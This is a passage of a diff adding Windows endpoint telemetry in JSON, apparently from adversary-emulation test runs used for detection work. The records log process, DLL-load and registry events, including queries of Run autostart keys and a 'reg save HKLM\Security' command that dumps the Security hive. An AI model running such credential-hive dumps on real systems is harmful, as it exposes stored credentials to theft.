+ "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2152, + "ppid": 3496, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571315220000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "process", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "process", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4548, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571315880000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "command_line": "reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 888, + "ppid": 4548, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571316110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "process", + "pid": 888, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010A3D05001}" + }, + { + "event_type": "process", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\Security security.hive\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 132, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571316290000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571316210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001016D25001}" + }, + { + "command_line": "reg save HKLM\\Security security.hive", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6700, + "ppid": 132, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571316430000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001016D25001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6700, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571316360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00100AD35001}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883571421830000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883571447460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883571447460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571449020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571449020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571449020000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883571467310016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA314B055", + "registry_value": "41C64E6DA314B055", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", + "registry_value": "{9c8ac93b-a8c5-49d7-a478-c0f618a522de}", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883571688710000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + 